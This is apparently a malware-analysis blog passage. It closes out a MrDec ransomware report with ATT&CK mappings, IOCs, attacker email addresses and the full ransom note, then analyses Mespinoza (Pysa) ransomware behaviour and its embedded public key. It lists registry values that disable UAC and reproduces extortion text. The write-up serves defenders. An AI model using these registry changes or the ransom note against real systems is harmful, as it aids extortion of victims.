<p><center><img alt="Connected Drives" src="https://dissectingmalwa.re/img/mrdec-drives.png"></center></p>
<p><br/> In the following screenshot you can see the "Process Killing" routine of MrDec.</p>
<p><center><img alt="Process Kill Routine" src="https://dissectingmalwa.re/img/mrdec-processkill.png"></center></p>
<p><br/></p>
<p>Last but not least we have a weird discovery. </p>
<p><center><img alt="clop?" src="https://dissectingmalwa.re/img/mrdec-clop.png"></center></p>
<p><br/></p>
<h2><strong>MITRE ATT&CK</strong></h2>
<p><em>T1215</em> --> Kernel Modules and Extensions --> Persistence</p>
<p><em>T1179</em> --> Hooking --> Persistence</p>
<p><em>T1060</em> --> Registry Run Keys / Start Folder --> Persistence</p>
<p><em>T1055</em> --> Process Injection --> Privilege Escalation</p>
<p><em>T1179</em> --> Hooking --> Privilege Escalation</p>
<p><em>T1055</em> --> Process Injection --> Defense Evasion</p>
<p><em>T1045</em> --> Software Packing --> Defense Evasion</p>
<p><em>T1112</em> --> Modify Registry --> Defense Evasion</p>
<p><em>T1107</em> --> File Deletion --> Defense Evasion</p>
<p><em>T1179</em> --> Hooking --> Credential Access</p>
<p><em>T1012</em> --> Query Registry --> Discovery</p>
<p><em>T1057</em> --> Process Discovery --> Discovery</p>
<p><em>T1076</em> --> Remote Desktop Protocol --> Lateral Movement</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>MrDec</h3>
<div class="highlight"><pre><span></span><span class="n">searchfiles</span><span class="p">.</span><span class="n">exe</span> <span class="c1">--> SHA256: a700f9ced75c4143da6c4d1e09d6778e84ff570ea7d297fc130a0844e56c96ad </span>
<span class="n">SSDEEP</span><span class="p">:</span> <span class="mi">192</span><span class="p">:</span><span class="n">QEsTzSIs3HIuvipDu3uTtKTzTwmH</span><span class="o">+</span><span class="n">STs8fpgiRHIYGL4vKrGoO</span><span class="p">:</span><span class="n">QE0JoapKeTtKTz8s</span><span class="o">+</span><span class="n">S48h5dIYxK</span>
</pre></div>
<h3>Registry Keys</h3>
<div class="highlight"><pre><span></span><span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Run</span><span class="w"></span>
<span class="n">unlock</span><span class="w"> </span><span class="c1">--> "c:\Decoding help.hta"</span>
<span class="n">searchfiles</span><span class="w"> </span><span class="c1">--> C:\windows\searchfiles.exe</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="nc">DateTime</span><span class="w"></span>
<span class="n">orsa</span><span class="c1">--> 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 07 AF 04 2E A4 1A 3C 08 5E 32 C7 4F 6A DB C8 7C 91 6B C1 FE 73 38 2F 4F 7C EA B8 B6 BC BD CB 22 5C 6B E6 1C E0 35 24 58 ED C8 BC EF A9 A6 EC AE 4F 84 AF BC E8 D7 50 4B C5 2A 6F 85 5E E9 A1 46 5F 2A 65 E7 0E 97 74 4B 16 D5 C4 4C 28 6B 17 47 EC F0 B9 A5 72 C4 DB EE 67 1D C6 0D DD 58 93 FF CE 38 64 5D 92 0E 93 AC A6 BC 31 B5 6D ED A6 74 8F 59 F3 40 EF FD A9 7D 18 12 4F 0A 51 AF D6 1F EE 1E 17 4B A2 D7 CD 20 B4 4F FD DF 5C BB CD B6 A4 BC D2 8D 85 17 F9 95 BF FD 67 16 36 15 69 7A BC A2 FD 0F EC F6 D4 A4 92 94 3A AC FC 78 77 81 4B F4 E8 2E AD 55 52 27 67 EF E9 48 1F 1D 8B F5 35 8F 71 AA DA 84 75 79 A2 1C BD 32 90 8B EB 54 88 3F CC 51 C9 48 2A 47 76 79 CE EB B4 A7 ED D5 DF C3 EB 50 09 25 CC FE F3 DB 49 29 A6 6B 4F 69 AF 10 3A 1F 2F 86 1A 0C B4 90 EB 21 DF 4E 43 B3</span>
<span class="n">rsa</span><span class="w"> </span><span class="c1">--> 3C 53 81 1E 96 58 52 7C 67 7D 5F 60 14 15 29 1B 72 AC F5 F6 B7 B8 54 32 B7 63 1A 24 4F B2 9E B5 C7 8B 29 68 40 6B 44 80 FA E4 5E 53 7B 4A 1D DE AD 28 4A E0 EF 65 1E 09 00 75 34 15 79 59 86 C9 61 ED DD E2 AE 4F 3C DA 45 7A 20 3F 85 85 FB 05 22 1E 9D 12 D2 C7 96 AB 8A 99 46 60 F0 CB 10 6C 2E A0 39 FF 07 80 A1 A4 3B 62 E6 71 93 C6 5D 42 00 1B 00 37 76 56 14 2F 72 78 F9 A2 A6 98 49 A7 38 E0 B0 A6 81 B8 F5 7F 79 7C 29 88 79 C3 98 65 C0 69 47 93 59 28 A8 BF 36 6F 88 C0 08 98 0F 6E C8 27 28 9A C8 12 F2 B2 09 7B F0 A3 1E 9A 3A 48 CE 04 C3 61 82 6B AF 2E 0D 46 14 3A F9 47 3E 26 B0 B3 67 49 81 56 DF E8 DF A4 FC 86 88 A0 80 7C 68 6D 46 84 3E 6F 30 FA 20 AC 54 3F AC 8B C3 E9 24 C3 27 31 4C A1 07 98 C2 BD D8 84 02 17 D7 3D 63 83 8F 7C 35 D3 6C C8 29 69 E6 F5 DD D8 DB AA A5 0D 9A 12 43 5D CE CA 47 6E E5 CA A5 DB D8 A6 9F FE FD DE C2 94 24 92 43 C9 08 88 FB B2 33 2B C8 59 1D B6 F2 55 71 E2 83 C7 F5 67 89 03 06 F1 E4 FC F1 13 2D 38 7B 15 DE 05 BE 27 0A AE CD A9 84 2C 3B 66 4B 18 F7 8D 76 31 BD 37 07 ED 1C D9 68 82 94 EF 08 5C B6 29 C4 69 A9 AB 07 6B B7 46 9C 0F DD A9 76 32 B2 D7 F7 FA 3A 25 15 9B A6 F7 55 93 77 DF 67 24 E0 48 B9 CC B0 39 22 B0 51 36 5B F8 DC 2A 0D 19 CC 7E EC D3 9E 9C 68 38 E4 11 DE BD 2B AE 2E A2 FA AC 86 35 D6 DC C8 4E 9D E5 8A BE B3 EC 6C 5B BB BD CB 61 F1 81 99 1F 5E 1A 80 AF 72 75 CA 55 7E 7B 93 ED F3 EB 7A 2F 5E D9 61 32 99 0C 95 3B 4C 9C CD F7 4C A5 4C 5D DB CA 72 2E BB 7B 4D 76 C5 5D CA 27 76 29 C1 4A 36 3E 66 7F 5F 29 A1 A8 AD FC BB FF 2A 11 16 29 63 8C A8 92 75 FC 0E 56 72 DC 01 9B B9 81 1C E0 14 84 8F F2 1B 15 F8 AC 0A BA 07 22 6D E0 DA A0 8B CF C1 26 0C 69 78 48 BE 24 53 E6 5E A7 A7 10 24 58 EA 26 30 6A 37 0E 30 9A FF 6E 18 90 2F 93 33 61 11 C1 7B 62 85 A8 A0 E8 3F EA 65 FC 58 3E FD BC 20 55 03 C3 95 63 2E AD 9D 0A 8E 45 87 F6 19 34 D3 48 7E 2E F2 06 BE D0 EE B9 6D 82 62 3E 51 C9 27 96 64 07 84 70 50 C0 A1 2B 13 D3 25 EA C8 62 F1 1F C5 59 B0 6B 3B 52 54 3B 1B 21 42 7B 80 CB E7 58 3D F2 A3 7F F8 48 C0 9E 1E 78 E4 0F F0 7F 50 4D D8 06 C2 53 47 3A 93 B0 AD D7 BF 5A 3F 5A F8 5B BF 60 66 0B EC B6 AF 50 5B 52 9C 82 E3 F8 EC 40 FF ED AB 4C 5C 29 E7 C4 41 87 48 B4 C1 92 74 54 A1 47 70 8A 03 94 AE AE 57 86 FF E2 BE 14 E6 F8 0C D1 73 D9 1A 2E 2E 1E B1 9E 31 3A 3D 0A F1 19 6C 4C 48 F9 C0 7A 58 9E 8F 46 F7 9C 14 26 64 2A 57 A1 88 2A A7 D5 02 6B 76 AE AB 69 C8 64 16 7A 7F E0 43 A7 14 DE 29 19 A7 3B 78 D7 02 8C 9F F5 BF 09 1E 6B BB 47 88 3E 30 76 3B DF AF 87 CB 47 2A 84 D8 B9 88 96 09 A1 EF B0 1E 99 B1 0E 07 8D 37 FF 94 BF C6 94 17 AD 95 15 30 78 FE FC 9A AB 6E B8 8B C2 9E F0 B9 8B 83 30 45 DF F3 22 28 AD 4A 8D 69 E4 7E B6 83 1E 80 C9 8B 9C 97 BE ED FD 72 D8 A8 68 21 79 CC 53 87 54 FE CB D7 38 A0 44 ED E3 15 48 D6 CD E1 14 32 0A 49 72 FC 08 7F 36 17 60 5B CA B1 BE 89 21 08 09 02 25 94 AC E2 A0 B8 F5 B6 DF 49 17 86 C6 A3 4A 7D 48 0F 27 EF 1E 48 91 71 A1 A3 2A D3 2F CF 4F B8 39 B7 04 76 CA 26 EA CF C8 A7 0F 42 BD 7B A7 50 FC 01 D3 94 1B 8B 2C F3 1C 87 CA E0 9F E3 CA B9 FF 31 69 ED DB 5F E2 2E 04 64 52 08 C8 B3 F5 9F 04 CB 31 7C D3 AD 78 76 83 5F 53 8F 5C 3C D8 CD 4D 2D 49 8A 2C CA 4D C9 43 AC B0 88 45 E5 41 7F FA 1D BF 92 9D BF C0 06 5C 24 CE 44 A1 F6 D0 ED 0C 46 BF 88 F2 DA B1 71 D6 E6 EE 87 85 29 36 AD 84 ED 7D F8 4C 8F BB 5A 44 DA 4C A4 4B B7 60 17 B8 BE 49 12 DB 15 DC 84 D4 89 08 B5 27 84 71 92 5E 3D 5A A3 0A AA 0D FD 5E 32 56 DC A3 4B 89 F9 9D 28 A6 AC C3 31 68 F3 98 31 D3 0A 38 B6 E4 DD 87 8E 2E 95 A8 D4 BE 23 FB 48 42 BD 07 80 AC 8E D8 97 0F 46 C6 55 D8 F0 98 3F 33 26 47 A8 05 82 B3 D7 5D 08 A1 4A 30 F9 80 5D 7F 8A 80 98 A0 F5 C8 8A 56 FF EC 44 C3 20 40 AB 06 1C 8C 3B D1 E5 79 5B 02 F2 25 F8 06 31 54 B5 60 38 68 C7 EC 42 E9 36 BD 47 B6 BE 06 A8 1B 5B 92 0D 29 CD B3 E9 F5 7A EB E5 27 83 BC 0E 48 F6 93 21 62 81 0B CE E4 92 67 35 4E AB 23 B7 AA 86 25 78 91 22 38 CC C1 95 A5 D4 4D 20 FE E3 AE F8 8F 24 E9 38 75 B2 31 82 49 00 D4 8F 9A 93 E0 A0 DD D3 B1 F8 B9 B9 3D 2D 02</span>
<span class="n">HKEY_LOCAL_MACHINE</span><span class="err">\</span><span class="n">SOFTWARE</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Policies</span><span class="err">\</span><span class="k">System</span><span class="w"></span>
<span class="n">PromptOnSecureDesktop</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">EnableLUA</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">ConsentPromptBehaviorAdmin</span><span class="w"> </span><span class="c1">--> 0</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOzv5ecUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="w"></span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="w"> </span><span class="c1">--> HKEY_CLASSES_ROOT\[ID]PFOBHpZYUnxnfV9F[ID]_auto_file</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="err">\</span><span class="n">command</span><span class="w"> </span><span class="c1">--> %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="err">\</span><span class="n">DropTarget</span><span class="w"> </span><span class="c1">--> {FFE2A43C-56B9-4bf5-9A79-CC6D4285608A}</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">open</span><span class="w"> </span><span class="c1">--> @photoviewer.dll,-3043</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">print</span><span class="err">\</span><span class="n">command</span><span class="w"> </span><span class="c1">--> %SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1</span>
<span class="n">HKEY_CLASSES_ROOT</span><span class="err">\</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">_auto_file</span><span class="err">\</span><span class="n">shell</span><span class="err">\</span><span class="k">print</span><span class="err">\</span><span class="n">DropTarget</span><span class="w"> </span><span class="c1">--> {60fd46de-f830-4894-a628-6fa81bc0190d}</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Explorer</span><span class="err">\</span><span class="n">FileExts</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="err">\</span><span class="n">OpenWithList</span><span class="w"> </span><span class="c1">--> PhotoViewer.dll</span>
<span class="n">HKEY_CURRENT_USER</span><span class="err">\</span><span class="n">Software</span><span class="err">\</span><span class="n">Microsoft</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">CurrentVersion</span><span class="err">\</span><span class="n">Explorer</span><span class="err">\</span><span class="n">FileExts</span><span class="err">\</span><span class="p">.</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="n">PFOBHpZYUnxnfV9F</span><span class="o">[</span><span class="n">ID</span><span class="o">]</span><span class="err">\</span><span class="n">OpenWithProgids</span><span class="w"> </span><span class="c1">--> ID]PFOBHpZYUnxnfV9F[ID]_auto_file</span>
</pre></div>
<h3>E-Mail Addresses</h3>
<div class="highlight"><pre><span></span><span class="k">First</span><span class="w"> </span><span class="n">campaign</span><span class="w"> </span><span class="p">(</span><span class="n">May</span><span class="w"> </span><span class="mi">2018</span><span class="p">)</span><span class="err">:</span><span class="w"></span>
<span class="n">shine1</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">shine2</span><span class="nv">@protonmail</span><span class="p">.</span><span class="n">com</span><span class="w"></span>
<span class="k">Second</span><span class="w"> </span><span class="n">campaign</span><span class="w"> </span><span class="p">(</span><span class="n">September</span><span class="o">/</span><span class="n">October</span><span class="w"> </span><span class="mi">2019</span><span class="p">)</span><span class="err">:</span><span class="w"></span>
<span class="n">JonStokton</span><span class="nv">@Protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">JonStokton</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">filessnoop</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">filessnoop</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Third</span><span class="w"> </span><span class="nl">campaign</span><span class="p">:</span><span class="w"></span>
<span class="n">localgroup</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">localgroup</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ZiCoyote</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">ZiCoyote</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Forth</span><span class="w"> </span><span class="nl">campaign</span><span class="p">:</span><span class="w"></span>
<span class="n">mr</span><span class="p">.</span><span class="k">dec</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">mr</span><span class="p">.</span><span class="k">dec</span><span class="nv">@tutanota</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Frederik888</span><span class="nv">@protonmail</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
<span class="n">Frederik888</span><span class="nv">@aol</span><span class="o">[</span><span class="n">.</span><span class="o">]</span><span class="n">com</span><span class="w"></span>
</pre></div>
<h3>Ransomnote V1</h3>
<div class="highlight"><pre><span></span><span class="nv">You</span> <span class="nv">are</span> <span class="nv">unlucky</span><span class="o">!</span> <span class="nv">The</span> <span class="nv">terrible</span> <span class="nv">virus</span> <span class="nv">has</span> <span class="nv">captured</span> <span class="nv">your</span> <span class="nv">files</span><span class="o">!</span> <span class="k">For</span> <span class="nv">decoding</span> <span class="nv">please</span> <span class="nv">contact</span> <span class="nv">by</span> <span class="nv">email</span> <span class="nv">Frederik888</span>@<span class="nv">aol</span>.<span class="nv">com</span> <span class="nv">or</span> <span class="nv">Frederik888</span>@<span class="nv">protonmail</span>.<span class="nv">com</span>
<span class="nv">Your</span>
[<span class="nv">ID</span>]<span class="nv">PFOBHpZYUnxnfV9F</span>[<span class="nv">ID</span>]
<span class="mi">1</span>. <span class="nv">In</span> <span class="nv">the</span> <span class="nv">subject</span> <span class="nv">line</span>, <span class="nv">write</span> <span class="nv">your</span> <span class="nv">ID</span>.
<span class="mi">2</span>. <span class="nv">Attach</span> <span class="mi">1</span><span class="o">-</span><span class="mi">2</span> <span class="nv">infected</span> <span class="nv">files</span> <span class="nv">that</span> <span class="k">do</span> <span class="nv">not</span> <span class="nv">contain</span> <span class="nv">important</span> <span class="nv">information</span> <span class="ss">(</span><span class="nv">less</span> <span class="nv">than</span> <span class="mi">2</span> <span class="nv">mb</span><span class="ss">)</span>
<span class="nv">are</span> <span class="nv">required</span> <span class="nv">to</span> <span class="nv">generate</span> <span class="nv">the</span> <span class="nv">decoder</span> <span class="nv">and</span> <span class="nv">restore</span> <span class="nv">the</span> <span class="nv">test</span> <span class="nv">file</span>.
<span class="nv">Hurry</span> <span class="nv">up</span><span class="o">!</span> <span class="nv">Time</span> <span class="nv">is</span> <span class="nv">limited</span><span class="o">!</span>
<span class="nv">Attention</span><span class="o">!!!</span>
<span class="nv">At</span> <span class="nv">the</span> <span class="k">end</span> <span class="nv">of</span> <span class="nv">this</span> <span class="nv">time</span>, <span class="nv">the</span> <span class="nv">private</span> <span class="nv">key</span> <span class="k">for</span> <span class="nv">generating</span> <span class="nv">the</span> <span class="nv">decoder</span> <span class="nv">will</span> <span class="nv">be</span> <span class="nv">destroyed</span>. <span class="nv">Files</span> <span class="nv">will</span> <span class="nv">not</span> <span class="nv">be</span> <span class="nv">restored</span><span class="o">!</span>
</pre></div>
<p></br></p>Another one for the collection - Mespinoza (Pysa) Ransomware2019-12-14T00:00:00+01:002019-12-14T00:00:00+01:00f0wLtag:dissectingmalwa.re,2019-12-14:/another-one-for-the-collection-mespinoza-pysa-ransomware.html<p>Back in October of 2019 the Mespinoza Ransomware family first surfaced via Malspam. On the 14th of December it returned with a new extension <em>.pysa</em> so let's see if any changes have been made.</p><p>Fun Fact: The Extension "pysa" is probably derived from the Zanzibari Coin with the same name. Apparently it's quite popular with collectors. But enough of the pocket change, so let me put my two cents in on this sample :D </p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/pysa-coin.jpg"></center></p>
<h4><em>A general disclaimer as always: downloading and running the samples linked below will lead to the encryption of your personal data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Mespinoza (.pysa) @ <a href="https://app.any.run/tasks/858e7e0f-59c5-4f58-b426-1cef39a05cbc/">AnyRun</a> | <a href="https://www.virustotal.com/gui/file/a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327">HybridAnalysis</a>
--> <code>sha256 a18c85399cd1ec3f1ec85cd66ff2e97a0dcf7ccb17ecf697a5376da8eda4d327</code></p>
<p></br></p>
<p>As always: Running Detect it easy on the executable:</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/pysa-die.png"></center></p>
<p></br></p>
<p>One of the first things it will do is modify the <code>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System</code> Registry Key to set the following values. Unfortunately I couldn't confirm this action in a sandbox with RegShot yet.</p>
<p><center><img alt="Anti Debugging" src="https://dissectingmalwa.re/img/pysa-reg.png"></center></p>
<p></br></p>
<p>To retain basic functions of the Operating System Mespinoza will spare certain directories related directly to Windows and critical files.</p>
<p><center><img alt="Skipping of select folders" src="https://dissectingmalwa.re/img/pysa-skip.png"></center></p>
<p></br></p>
<p>It will also specifically look for SQL related processes. I will have to confirm this with a debugger, but most of the time database processes are killed by Ransomware to disrupt the service and make the files available for encryption.</p>
<p><center><img alt="Looking for SQL related strings" src="https://dissectingmalwa.re/img/pysa-sql.png"></center></p>
<p></br></p>
<p>Of course Mespinoza won't stop with the system drive so it will check for connected removable media or shared network drives. <em>GetDriveTypeW</em> will tell it which type of media the selected device belongs to.</p>
<p><center><img alt="Checking for system drives" src="https://dissectingmalwa.re/img/pysa-drives1.png"></center></p>
<p><center><img alt="Determining the drive type" src="https://dissectingmalwa.re/img/pysa-drives2.png"></center></p>
<p></br></p>
<p>Up until now I have not seen a ransomware sample running <em>verclsid.exe</em>, so let's investigate: <em>{0B2C9183-C9FA-4C53-AE21-C900B0C39965}</em> corresponds to C:\Windows\system32\SearchFolder.dll and <em>{0C733A8A-2A1C-11CE-ADE5-00AA0044773D}</em> matches the CLSID of IDBProperties which is part of the Microsoft SQL Server.</p>
<div class="highlight"><pre><span></span><span class="k">C</span><span class="p">:</span><span class="err">\</span><span class="n">Windows</span><span class="err">\</span><span class="n">system32</span><span class="err">\</span><span class="n">verclsid</span><span class="p">.</span><span class="n">exe</span><span class="err">"</span> <span class="o">/</span><span class="n">S</span> <span class="o">/</span><span class="k">C</span> <span class="err">{</span><span class="mi">0</span><span class="n">B2C9183</span><span class="o">-</span><span class="n">C9FA</span><span class="o">-</span><span class="mi">4</span><span class="n">C53</span><span class="o">-</span><span class="n">AE21</span><span class="o">-</span><span class="n">C900B0C39965</span><span class="err">}</span> <span class="o">/</span><span class="n">I</span> <span class="err">{</span><span class="mi">0</span><span class="n">C733A8A</span><span class="o">-</span><span class="mi">2</span><span class="n">A1C</span><span class="o">-</span><span class="mi">11</span><span class="n">CE</span><span class="o">-</span><span class="n">ADE5</span><span class="o">-</span><span class="mi">00</span><span class="n">AA0044773D</span><span class="err">}</span> <span class="o">/</span><span class="n">X</span> <span class="mi">0</span><span class="n">x401</span>
</pre></div>
<p></br></p>
<p>After looking at a string dump I found this hex string which is probably the key blob. I'll try to verify this with x32dbg later.</p>
<div class="highlight"><pre><span></span><span class="mi">30820220300</span><span class="n">D06092A864886F70D01010105000382020D003082020802820201009CC3A0141B5488CD31B7D2DD49F9221483CF5FADB558A52CE7670169223BDA9B3C65785F411F22E2B5D0CB890B393A4ADDAAF5D650F7F6EAD43EB5F31002B04A97873A8044D5A8D4BAB19C05FBF645EEA9E2458BB4B2A73E1EF5D1955DD000C6C626C7805B683B3EA64AEA62D50D8A45D956DDB8691BC838406291F2FC3FC707F4C9DA763D62AC7F029A4616AE883004A912CA5EAE2C6211ADF8EA56532A5BDE53DAE58B6ED6B86D9780CB3B5B884FDC7487DAC357A42276E97C3DEFAB6A458063EBE9AFECBDF89B1BB9A7CFD5313D10D2D7CD6E14170B5C36F69508E8B5610C08328F2593E32D48B6BE378A2FDF58BB3ECDDAD9B69304F9936E93F84EE3660A42758F39D4EF8428E84551F3583602BB3230D662362C43A8E90B5B413A7416A1FCC89BD37A6A793192CF3E8552975E55FDA9472F7666CA4E6F59317AB7195B91C6B18959C6B91E70E40533F40126FECCCFB8E3BA2BE1804EEC3C54847A828C6F6665138E6E38D315198372B85B906E08EDC081A959B504E6583BA05D58D71BF7BD019B3F2C4BA800B5C7FFE04B0B8EF48095025E553B13304EAE76E23242266E6F8E7A1FEFF4F23B586F092932A765C8141F84A91D296F1EA2DCF5DB31E66BE8B76E1BB6DC1353CE5D2F998A2BA1C4ACF6CFEE7FB349A0B6A5E9D0CE010BD4D834F7EE2E265241D65C9B347BB69368DC59308EBE884EFB8389F4E31A20339B79020111</span>
</pre></div>
<p></br></p>
<p>Turns out that the encrypted key is appended to the end of each file affected by the ransomware (which is a common tactic for some strains).</p>
<p><center><img alt="Appended and encrypted key" src="https://dissectingmalwa.re/img/pysa-file.png"></center></p>
<p>As this article is work in progress I will update it as soon as I can. As I did not see the Malware deleting the Volume Shadow Copies until now, so one option for possible victims would be to run <a href="https://www.cgsecurity.org/wiki/PhotoRec">Photorec</a> or <a href="https://www.ccleaner.com/recuva">Recuva</a> to check for recoverable files.</p>
<p><br></p>
<h2><strong>Update 22.01.2020:</strong></h2>
<p>There's a new version of the Mespinoza / .pysa Variant compiled on the 18th of JaΕuary: </p>
<p>Mespinoza (.pysa) @ <a href="https://app.any.run/tasks/858e7e0f-59c5-4f58-b426-1cef39a05cbc/">AnyRun</a> --> <code>`sha256 e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead</code></p>
<p><br></p>
<p>In the screenshot below you can see a comparison of the old sample (1.exe) and the new one (1.bin). Exept for a few minor changes the two samples are mostly identical:</p>
<p><center><img alt="Appended and encrypted key" src="https://dissectingmalwa.re/img/mez-comp.png"></center></p>
<p>The public Key used by the criminals is still the same (converted from hex to raw, key blob located in the binary): </p>
<div class="highlight"><pre><span></span><span class="n">MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEA6dYN</span><span class="o">+</span><span class="n">TogNihncAJNXRhtUeyj7EQ</span><span class="o">/</span><span class="n">BIGbupIM</span>
<span class="n">q5PRI3a1</span><span class="o">+</span><span class="n">HqMXEk5vdb3NhzFBUoVhY</span><span class="o">/</span><span class="n">jTEE71flTwHM73q9PrgovaYSl8HeXZaU</span><span class="o">+</span><span class="n">HkqjF7Ofu4Qf</span><span class="o">+</span><span class="n">SDk</span>
<span class="n">oPxcubX4cFYV1r97z9vcFgFehzk</span><span class="o">+</span><span class="mi">9</span><span class="n">CofEnHWEo2N656QGRXeO0PaJX</span><span class="o">/</span><span class="n">riiL672KHzMDNKzfZQnmpMHL</span><span class="o">+</span>
<span class="n">KzeyJaaPVVz7V9qCCkjT</span><span class="o">+</span><span class="n">IT26xtG2jY5tggepfLQfB6ExxaoJ1j0GapQMIZ3k6F1AtBmfcNvyu3cW29a</span>
<span class="n">bIOCsu1QRzfq6iSau2xx0ZaRz0l3vgU79PCLtsGw7BNPtKZdDL9dA879aKWlDBIizc3lg4IpHxdf5MOT</span>
<span class="n">mpQR0kst3kyOieNlIjEAyewyRQ788o3qs8k9SS</span><span class="o">+</span><span class="mi">89</span><span class="n">CD916AMEVqRcQH8ugBv5ocs0xAf</span><span class="o">+</span><span class="mi">2</span><span class="n">bHe13ogIRc</span>
<span class="n">iTz9ALTvtMSqhNptEBP</span><span class="o">/</span><span class="n">z</span><span class="o">+</span><span class="n">lIhuMTs2MrJRTaQLpVHUIlqAcQuLm8AHIYdGmBXEvUqPjRIo</span><span class="o">+</span><span class="n">L9Jb</span><span class="o">+</span><span class="n">P1XU</span>
<span class="n">cXYHvOZUBV0VFSOoyQeqiBeaYS</span><span class="o">+</span><span class="n">PhCV6TmTRHsH</span><span class="o">/</span><span class="mi">8</span><span class="n">XkPt</span><span class="o">/</span><span class="n">eGXm3Dk4feYNaZ5a9uQKYc9Akt6G0N</span><span class="o">+</span><span class="n">P8T</span>
<span class="mi">7</span><span class="n">zobyAWfQNqGFJhklh6JEAJw58XCJNdmETT68kfwtQ</span><span class="o">+</span><span class="n">XFB4caUHessaJ369lprAj4TjDUFfYkkm74ntG</span>
